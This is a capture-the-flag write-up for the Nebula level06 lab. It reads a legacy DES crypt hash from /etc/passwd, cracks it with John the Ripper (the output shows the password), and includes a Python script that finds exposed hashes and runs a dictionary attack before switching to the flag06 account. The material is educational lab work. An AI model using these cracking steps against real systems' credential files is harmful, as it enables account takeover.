The flag06 account credentials came from a legacy unix system.


The clue hints that the flag06 password was carried over from an old Unix system, where password hashes were stored directly in /etc/passwd. That suggests we might be able to read and crack the password of the flag06 user. Let’s take a look at the /etc/passwd file.

level06@nebula:~$ grep flag06 /etc/passwd
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh

Note that on modern systems /etc/passwd normally doesn’t contain password hashes: the second field holds only an x, and the hash lives in /etc/shadow, which unlike /etc/passwd is readable only by root. Legacy Unix kept the hash in the world-readable /etc/passwd itself, so any local user could copy it and crack it offline, which is exactly the situation here.

The field containing ueqwOCnSGdsuM is a password hash: a 13-character traditional DES crypt(3) hash, where the first two characters (ue) are the salt and the remaining 11 encode the result. Traditional crypt(3) only uses the first eight characters of the password, so the keyspace is small and cracking is fast. To crack it we’ll use a piece of software called John the Ripper, or john for short. It’s available on the Kali Linux distribution.

root@kali:~# john <(echo "flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh")
Using default input encoding: UTF-8
Loaded 1 password hash (descrypt, traditional crypt(3) [DES 128/128 AVX-16])
Press 'q' or Ctrl-C to abort, almost any other key for status
hello            (flag06)
1g 0:00:00:00 DONE 2/3 (2016-07-31 14:33) 100.0g/s 75000p/s 75000c/s 75000C/s 123456..marley
Use the "--show" option to display all of the cracked passwords reliably
Session completed

As you can see from the output, john recognised the hash as descrypt and, in wordlist mode (the "2/3" in the status line), found the password (hello) in less than 1 second!
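To show what john did under the hood, here is an added example (not part of the original writeup) that scans passwd-style lines for accounts whose password field still carries a real hash, identifies the hash type and salt, and runs a small dictionary attack against a traditional DES crypt(3) hash. It assumes a crypt(3) implementation is reachable either through Python’s crypt module (removed in Python 3.13) or through libcrypt via ctypes; the sample passwd text and wordlist are constructed for the example, with the flag06 line taken from the output above.

```python
"""Added example: find hashes exposed in /etc/passwd and crack a descrypt one.

Assumes crypt(3) is available via Python's `crypt` module (up to 3.12) or
libcrypt through ctypes. Hosts whose libcrypt was built without DES support
report descrypt_available() == False instead of cracking.
"""
import re


def _load_crypt():
    """Return a callable crypt(word, salt) -> str, or None if none is available."""
    try:
        import crypt  # deprecated in 3.11, removed in 3.13
        return crypt.crypt
    except ImportError:
        pass
    try:
        import ctypes
        import ctypes.util
        lib = ctypes.CDLL(ctypes.util.find_library("crypt") or "libcrypt.so.1")
        lib.crypt.restype = ctypes.c_char_p
        lib.crypt.argtypes = [ctypes.c_char_p, ctypes.c_char_p]

        def _crypt(word, salt):
            out = lib.crypt(word.encode(), salt.encode())
            return out.decode() if out else None
        return _crypt
    except (OSError, AttributeError):
        return None


_CRYPT = _load_crypt()


def descrypt_available():
    """True only if crypt(3) here really produces 13-char traditional DES hashes."""
    if _CRYPT is None:
        return False
    try:
        out = _CRYPT("probe", "ab")
    except OSError:
        return False
    # libxcrypt with DES disabled returns a failure token such as "*0"
    return bool(out) and len(out) == 13 and out.startswith("ab")


_DESCRYPT = re.compile(r"^[./0-9A-Za-z]{13}$")   # 2-char salt + 11 chars
_MODULAR = re.compile(r"^\$(?P<id>[0-9a-z]+)\$")   # $id$salt$hash format
_MODULAR_NAMES = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt",
                  "2a": "bcrypt", "2b": "bcrypt", "y": "yescrypt"}


def classify_password_field(field):
    """Name the kind of value found in the second field of a passwd line."""
    if field == "":
        return "empty"        # passwordless account
    if field == "x":
        return "shadowed"     # real hash lives in /etc/shadow
    if field.startswith(("!", "*")):
        return "locked"
    if _DESCRYPT.match(field):
        return "descrypt"     # legacy DES crypt(3), crackable offline
    m = _MODULAR.match(field)
    if m:
        return _MODULAR_NAMES.get(m.group("id"), "modular-crypt")
    return "unknown"


def exposed_hashes(passwd_text):
    """Return (user, hash, kind) for every passwd line that carries a real hash."""
    found = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:          # malformed line, skip rather than guess
            continue
        kind = classify_password_field(fields[1])
        if kind not in ("empty", "shadowed", "locked", "unknown"):
            found.append((fields[0], fields[1], kind))
    return found


def crack_descrypt(target, candidates):
    """Dictionary attack: hash each candidate with the target's own 2-char salt
    and compare against the full 13-char hash. Returns the word or None."""
    if not descrypt_available():
        raise RuntimeError("no traditional DES crypt(3) available on this host")
    salt = target[:2]
    for word in candidates:
        if _CRYPT(word, salt) == target:
            return word
    return None


# Constructed sample: the flag06 line from the writeup plus typical modern
# entries, to show which accounts a scan would single out.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/bin/sh
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh
level06:x:1007:1007::/home/level06:/bin/sh
"""

# Constructed wordlist; a real run would use john's password.lst or rockyou.
WORDLIST = ["123456", "password", "letmein", "hello", "marley"]

if __name__ == "__main__":
    for user, h, kind in exposed_hashes(SAMPLE_PASSWD):
        print(f"{user}: {kind} hash {h} (salt {h[:2]!r}) in world-readable passwd")
        if kind == "descrypt" and descrypt_available():
            print("  cracked:", crack_descrypt(h, WORDLIST))
```

Running it against the constructed sample singles out only flag06, and on a host with DES crypt(3) support the dictionary pass recovers hello with the same salt-and-compare loop that john performs, just far slower than john’s optimised DES implementation.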

Let’s use the password to become the flag06 user and run getflag!

level06@nebula:~$ su - flag06
Password:
flag06@nebula:~$ getflag
You have successfully executed getflag on a target account